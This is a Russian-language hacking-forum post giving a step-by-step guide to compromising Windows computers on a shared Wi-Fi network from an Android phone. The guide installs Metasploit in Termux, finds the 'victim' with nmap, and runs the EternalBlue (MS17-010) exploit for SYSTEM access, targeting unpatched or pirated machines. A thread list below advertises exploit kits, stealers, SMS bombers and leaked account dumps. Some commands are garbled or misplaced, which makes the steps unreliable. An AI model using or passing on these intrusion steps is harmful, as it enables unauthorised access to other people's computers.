Termux и exploit eternalblue

  • Автор темы T0pDro4eR
  • Дата начала
T

T0pDro4eR

Наверное чуть опоздал, слил тему с stf.st, но в одно время она была без хайда и я эту тему выложили на другой форум. Так что пусть полежит в этом разделе, на данный момент хайд составляет 30 симпатий и 100 сообщений


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


1. Качаем Termux в Google Play.

2. Подключаемся к любой wi-fi сети к которой подключена наша жертва.

3. Приступаем, обновляем все пакеты командами
Код:
apt-get update; pkg update; pkg curl update
4. Качаем metasploit

Код:
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh

5. Распаковываем его задавая права для распаковки

Код:
chmod 777 metasploit.sh

6. Запускаем установку

Код:
chmod 777 metasploit.sh

и ждём примерно 5 минут, зависит от вашего смартфона.

7. После установки метасплоита нам нужно узнать локальные IP компов в вашей сети, для этого воспользуемся nmap'ом (он понадобиться вам потом ещё во многом если я продолжу писать темы по Termux)

8. Установим nmap командой

Код:
apt-get install nmap

и сразу после установки проверяем нашу сетку

Код:
nmap -sn *адрес роутера*/24

Пример: nmap -sn 192.168.1.1/24 (адресс роутера узнаём командой arp и иногда этой же командой можно найти и компьютеры сразу, но бывает она не работает, поэтому пользуемся nmap'ом)

9. Узнаём свой ip дабы не ошибиться и не применить эксплоит на нас (хотя он в любом случае выдаст ошибку ибо мы со смартфона, а эксплоит для windows). Для про верки нашего ип используем ifconfig

10. Переходим в дерикторию с нужным нам эксплоитом

Код:
cd metasploit-framework/modules/exploits/windows/smb

и командой ls смотрим список.

11. Нам нужен данный эксплоит eternalblue.rb, выбираем его командой
Код:
cp ms17_010_eternalblue.rb eternalblue.rb
.

12. Так жертву нашли, свой ип знаем, эксплоит тоже нашли, можно приступать к атаке. Включаем метасплоит командой


Код:
msfconsole

13. Мы почти у финиша, включаем эксплоит

Код:
use exploits/windows/smb/eternalblue.rb

14. Подключаем IP жертвы

Код:
set RHOST *тут айпишник*

15. Самый лучший момент!!!

Код:
exploit

- и мы получаем доступ к компютеру от имени системы и находимся в командноой строке из котрой можем выполнять просто море действий с жертвой...

Ну вот такой небольшой гайд по данному эксплоиту, он не работает на Windows 10, есть некоторые ситуации в которых он работает, но после обновы осенью и отказа от SMB1 уязвимость перестала работать, если вы смотрели то самое видео овера то он назвал ту самую группу хакеров, благодаря которой эту уязвимость в винде начали резко госить. Но если винду не обновляли с лета 2017 или она пиратка, то уязвимость должна работать, на предидущих версиях работает всё стабильно.

Для последущего применения уязвимости нужно повторять лишь 9 12 13 14 15 шаги и частично 8 шаг, ну я думаю вы разберётесь дальше.
 
  • Like
Реакции: Aleksandr. и FaNToM3
Название темы
Автор Заголовок Раздел Ответы Дата
Q Интересно Ломаем cookie с помощью Termux Уязвимости и взлом 0
D Termux нужна помощь Вопросы и интересы 8
I Emacs VM или termux для программирования Свободное общение и флейм 0
J Интересно apk bomber in termux Спам / Флуд / Ддос 0
G DOS in termux Уязвимости и взлом 0
J Интересно Глушим сеть wi-fi в termux или kali WiFi/Wardriving/Bluejacking 4
E Интересно Автоматически устанавливаем стандартные инструменты ( termux ) Уязвимости и взлом 1
E Мощнейший спам звонками и SMS + любой вид DDoS-атаки Termux Раздача email 1
E Полная настройка Termux Раздача email 0
E Получение доступа к камерам Termux Другое 0
E Подслушиваем с помощью Termux Раздача email 0
E Подглядываем с помощью Termux Раздача email 11
E Sms spammer Termux Полезные статьи 0
M TBomb: Ещё один бомбер на python для termux Другие ЯП 0
M Atilo: разворачиваем linux-дистрибутив в Termux Полезные статьи 0
M spymer: Смс бомбер для termux Полезные статьи 2
V СМС спам в termux Другие ЯП 3
A Termux - инструмент "кул хацкера" Софт для работы с текстом/Другой софт 11
Scam_Guard SCAMGUARD TEAM |MAC OS STEALER | .url / .lnk Exploit| NFT SCAM | ЛЕНДИНГИ ДЛЯ ВСЕХ | ВСЕМУ ОБУЧИМ Ищу работу. Предлагаю свои услуги. 0
V PDF Exploit Silent 2022 FUD Продажа софта 0
S Закрыто Bluekeep exploit Корзина 1
NickelBlack Интересно Exploit Pack 13.04 cracked by CRTeam Spam/DDOS/Malware 5
C [FREE]OLE Doc Exploit (Embedded) 2021 Корзина 0
C [FREE]PDF Exploit 2021 Корзина 0
B Закрыто Информация на форуме exploit Корзина 2
АнАлЬнАя ЧуПаКаБрА Zabugor EXPLOIT.IN DATABASE DUMP | MILLIONS OF ACCOUNTS! | 8.3GB WORTH OF COMBOS! Раздача email 6
L I want to buy 0-day exploit Куплю/Продам 0
M Интересно Cлив exploit Black list и Разборки 30
B Продам Exploit+rat осталось 6 месяцев Все что не подошло по разделу 0
N Gr3eNoX Exploit Scanner V.6.0 -2019 New Уязвимости и взлом 1
АнАлЬнАя ЧуПаКаБрА [Private Keeper] Exploit.in Brute/Checker Проекты Private Keeper 0
1 Word Silent Exploit Builder exe c doc! Софт для работы с текстом/Другой софт 3
S Office exploit builder excel/word Уязвимости и взлом 5
G [Слив] Office exploit builder excel/word Полезные статьи 4
P 0 day pdf exploit? Уязвимости и взлом 2
P 64-bit iOS kernel exploit <= 10.3.1, взлом ядра iOS Уязвимости и взлом 0
TarasGyska VMware Escape Exploit, CVE-2017-4901 Уязвимости и взлом 0
АнАлЬнАя ЧуПаКаБрА [2.2] UberBruTe - [c0d3d By Yulya ([email protected])] Бруты/Парсеры/Чекеры 1
A AntiDetect 7 Release 1 - [Cracked By PC-RET ([email protected])] Софт для работы с текстом/Другой софт 24
E Analog multiple exploit Builder v16.7.16 Cracked Вирусология 2
P CUPS Remote Code Execution exploit (CVE-2015-1158) Уязвимости и взлом 0
АнАлЬнАя ЧуПаКаБрА AntiDetect 7 Release 1 - [Cracked By PC-RET ([email protected])] Софт для работы с текстом/Другой софт 0
F Hunter Exploit Pack - поделка w0rm'a Уязвимости и взлом 0
K [email protected] крыса / [email protected] мошенник Black list и Разборки 2
Admin Phoenix Exploit Kit - RCE Уязвимости и взлом 0
Admin MS Word Exploit Вирусология 2
I EternalBlue эксплоит АНБ Полезные статьи 4
S Бесплатный сканер обнаружил более 50 000 уязвимых перед ETERNALBLUE машин Новости в сети 0
E EternalBlue - Взлом Windows PC Уязвимости и взлом 0

Название темы